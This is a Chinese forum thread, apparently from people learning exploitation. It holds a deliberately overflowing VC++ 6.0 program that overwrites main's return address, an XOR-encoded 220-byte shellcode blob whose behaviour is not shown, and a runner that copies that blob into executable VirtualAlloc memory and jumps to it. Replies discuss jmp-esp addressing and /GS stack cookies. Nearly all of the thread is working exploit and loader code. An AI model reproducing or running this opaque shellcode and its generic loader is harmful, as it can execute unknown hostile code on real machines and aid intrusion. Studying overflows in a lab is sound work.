windows 7 sp1 32位 vc++6.0 green
/*
 * Stack-overflow proof of concept from the thread (the poster's target is a
 * Windows 7 SP1 32-bit / VC++ 6.0 build).  `name` is deliberately longer
 * than `buffer`; the bytes that spill past the buffer are meant to clobber
 * main's saved return address so the payload runs when main returns.  The
 * overflow is the point of the listing, not a bug to fix -- but run it only
 * in a disposable VM, because what the decoded payload does is not shown
 * anywhere on this page.
 *
 * Layout of `name`, counted from the literals below:
 *   220 payload bytes + 66 NOP (0x90) bytes + 3 address bytes = 289 bytes,
 *   plus the implicit string terminator = 290 bytes copied into buffer[256].
 * None of the 289 explicit bytes is 0x00, so strcpy copies all of them; the
 * terminator is what supplies the top 0x00 byte of the address at the end.
 */
#include "stdio.h"
#include "string.h"

char name[] =
    /*
     * Payload.  The opening bytes decode as fxch / mov edi,imm32 /
     * fnstenv [esp-0xc] / pop edx / xor ecx,ecx / mov cl,0x31 /
     * xor [edx+0x18],edi ... -- an fnstenv-based GetPC + XOR decoder stub
     * (metasploit shikata_ga_nai style; confirm in a disassembler).  Two
     * consequences for this PoC:
     *   - the stub rewrites the bytes after it in place, so wherever the blob
     *     runs from must be writable as well as executable.  Here that is the
     *     stack, which only works if DEP/NX is not enforced for the process
     *     (a VC++ 6.0 binary has no /NXCOMPAT; whether Win7 applies DEP to it
     *     depends on the system DEP policy);
     *   - being a GetPC stub it does not care which address it runs at, so
     *     only the overwritten return address has to be right.
     */
    "\xd9\xca\xbf\x19\xde\x0e\xc3\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
    "\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x1d\x3c\xfb\x3f\xf5\x42"
    "\x04\xc0\x05\x23\x8c\x25\x34\x63\xea\x2e\x66\x53\x78\x62\x8a"
    "\x18\x2c\x97\x19\x6c\xf9\x98\xaa\xdb\xdf\x97\x2b\x77\x23\xb9"
    "\xaf\x8a\x70\x19\x8e\x44\x85\x58\xd7\xb9\x64\x08\x80\xb6\xdb"
    "\xbd\xa5\x83\xe7\x36\xf5\x02\x60\xaa\x4d\x24\x41\x7d\xc6\x7f"
    "\x41\x7f\x0b\xf4\xc8\x67\x48\x31\x82\x1c\xba\xcd\x15\xf5\xf3"
    "\x2e\xb9\x38\x3c\xdd\xc3\x7d\xfa\x3e\xb6\x77\xf9\xc3\xc1\x43"
    "\x80\x1f\x47\x50\x22\xeb\xff\xbc\xd3\x38\x99\x37\xdf\xf5\xed"
    "\x10\xc3\x08\x21\x2b\xff\x81\xc4\xfc\x76\xd1\xe2\xd8\xd3\x81"
    "\x8b\x79\xb9\x64\xb3\x9a\x62\xd8\x11\xd0\x8e\x0d\x28\xbb\xc4"
    "\xd0\xbe\xc1\xaa\xd3\xc0\xc9\x9a\xbb\xf1\x42\x75\xbb\x0d\x81"
    "\x32\x33\x44\x88\x12\xdc\x01\x58\x27\x81\xb1\xb6\x6b\xbc\x31"
    "\x33\x13\x3b\x29\x36\x16\x07\xed\xaa\x6a\x18\x98\xcc\xd9\x19"
    "\x89\xae\xbc\x89\x51\x1f\x5b\x2a\xf3\x5f"
    /*
     * 66-byte NOP sled.  Note that it sits AFTER the payload: a return that
     * lands inside the sled slides forward into the address bytes, not into
     * the payload, so the overwritten return address has to point at (or
     * before) the first payload byte.  In this layout the sled only pads the
     * distance from `buffer` to the return-address slot.
     */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90"
    /*
     * Little-endian 0x0012fe48 once the terminator adds the high 0x00 byte:
     * a hard-coded stack address that must equal wherever `buffer` ends up
     * in the poster's build.  It works only with a non-randomised stack and
     * this exact frame layout; a different compiler, build setting, debugger
     * or ASLR moves it.  A jmp-esp gadget address (as a follow-up reply
     * suggests) is the usual more robust choice, but that requires the
     * payload to sit where ESP points after the return, which with this
     * layout it does not.
     */
    "\x48\xfe\x12";

/*
 * Copies the oversized string into a 256-byte stack buffer (the overflow),
 * echoes it, then blocks on getchar() so a debugger can be attached before
 * main returns through the clobbered return address.  VC++ 6.0 predates the
 * MSVC /GS stack cookie, so no cookie check runs before that return.  Which
 * of the 34 spilled bytes reach the saved EBP and return address depends on
 * the compiler's frame layout (VC6 debug builds add padding) -- verify in a
 * debugger rather than assuming.
 */
int main()
{
    char buffer[256];
    strcpy(buffer,name);   /* deliberate overflow: 290 bytes into 256 */
    printf("%s\n",buffer);
    getchar();             /* pause so the process can be inspected before returning */
    return 0;
}
BDBig 你的意思是原shellcode正常?你的shellcode。。。修正过函数吗
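#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/*
 * Harness that jumps straight into the payload, apparently to check that the
 * shellcode itself works before relying on it inside the stack-overflow PoC.
 * Run it only inside a disposable VM: what the decoded payload does is not
 * shown anywhere on this page.
 */

/*
 * 220 raw payload bytes (221 with the implicit terminator).  The leading
 * bytes decode as fxch / mov edi,imm32 / fnstenv [esp-0xc] / pop edx /
 * xor ecx,ecx / mov cl,0x31 / xor [edx+0x18],edi ... -- an fnstenv-based
 * GetPC + XOR decoder stub (metasploit shikata_ga_nai style; confirm in a
 * disassembler).  Being a GetPC stub it is position independent, but it
 * decodes the following bytes in place, so the memory it executes from has
 * to be writable AND executable.
 */
unsigned char shellcode[] =
    "\xd9\xca\xbf\x19\xde\x0e\xc3\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
    "\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x1d\x3c\xfb\x3f\xf5\x42"
    "\x04\xc0\x05\x23\x8c\x25\x34\x63\xea\x2e\x66\x53\x78\x62\x8a"
    "\x18\x2c\x97\x19\x6c\xf9\x98\xaa\xdb\xdf\x97\x2b\x77\x23\xb9"
    "\xaf\x8a\x70\x19\x8e\x44\x85\x58\xd7\xb9\x64\x08\x80\xb6\xdb"
    "\xbd\xa5\x83\xe7\x36\xf5\x02\x60\xaa\x4d\x24\x41\x7d\xc6\x7f"
    "\x41\x7f\x0b\xf4\xc8\x67\x48\x31\x82\x1c\xba\xcd\x15\xf5\xf3"
    "\x2e\xb9\x38\x3c\xdd\xc3\x7d\xfa\x3e\xb6\x77\xf9\xc3\xc1\x43"
    "\x80\x1f\x47\x50\x22\xeb\xff\xbc\xd3\x38\x99\x37\xdf\xf5\xed"
    "\x10\xc3\x08\x21\x2b\xff\x81\xc4\xfc\x76\xd1\xe2\xd8\xd3\x81"
    "\x8b\x79\xb9\x64\xb3\x9a\x62\xd8\x11\xd0\x8e\x0d\x28\xbb\xc4"
    "\xd0\xbe\xc1\xaa\xd3\xc0\xc9\x9a\xbb\xf1\x42\x75\xbb\x0d\x81"
    "\x32\x33\x44\x88\x12\xdc\x01\x58\x27\x81\xb1\xb6\x6b\xbc\x31"
    "\x33\x13\x3b\x29\x36\x16\x07\xed\xaa\x6a\x18\x98\xcc\xd9\x19"
    "\x89\xae\xbc\x89\x51\x1f\x5b\x2a\xf3\x5f";

/*
 * Function-pointer type used for the jump.  Zero arguments, so __stdcall vs
 * __cdecl makes no difference to the call itself; the MSVC spelling is kept
 * on Windows and a plain pointer is used elsewhere so the file still builds.
 */
#ifdef _WIN32
typedef void (__stdcall *CODE)(void);
#else
typedef void (*CODE)(void);
#endif

/*
 * Transfers control to `shellcode`.
 *
 * On Windows the bytes are first copied into a VirtualAlloc'd
 * PAGE_EXECUTE_READWRITE region.  The original jumped straight into the
 * .data array: that page is writable (which the self-decoding stub needs)
 * but not executable, so the jump faults with an access violation as soon
 * as DEP/NX is enforced for the process.  Whether Win7 applies DEP to a
 * VC++ 6.0 binary (no /NXCOMPAT flag) depends on the system DEP policy, so
 * the direct jump "works" on some machines and crashes on others; an
 * explicitly executable region removes that dependency.  On non-Windows
 * builds the original direct call is kept and fails the same way under NX.
 *
 * Prints to stderr and returns without running anything if the allocation
 * fails.  Does not return at all if the payload does not return.
 */
void RunShellCode_2(void)
{
#ifdef _WIN32
    void *exec = VirtualAlloc(NULL, sizeof shellcode,
                              MEM_COMMIT | MEM_RESERVE,
                              PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        fprintf(stderr, "VirtualAlloc failed (error %lu)\n",
                (unsigned long)GetLastError());
        return;
    }
    memcpy(exec, shellcode, sizeof shellcode);
    ((CODE)exec)();
    VirtualFree(exec, 0, MEM_RELEASE);   /* only reached if the payload returns */
#else
    /* Original behaviour: execute the .data array in place. */
    ((CODE)shellcode)();
#endif
}

/* Entry point: runs the payload once.  `int main(void)` replaces the
 * non-standard `void main()` of the original. */
int main(void)
{
    RunShellCode_2();
    return 0;
}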
netwind 你要动态调试一下,用一处指向指令jmp esp的地址覆盖返回地址,然后函数返回时esp要指向shellcode才行。上面的代码函数返回时esp是不指向shellcode的
不对,好像 C++ 的编译器都会自带栈值检测和栈的安全性检测,我记得好像是叫个 Cookie 的东西,所以 C++ 下想着函数溢出我不太了解,还是内联汇编吧。(注:这里说的 Cookie 指的是 MSVC 的 /GS 栈保护,据我所知它从 Visual C++ .NET 2002 才开始提供,并非所有 C++ 编译器都有;楼主用的 VC++ 6.0 并没有这项检查,上面代码的溢出不会被 Cookie 拦住。)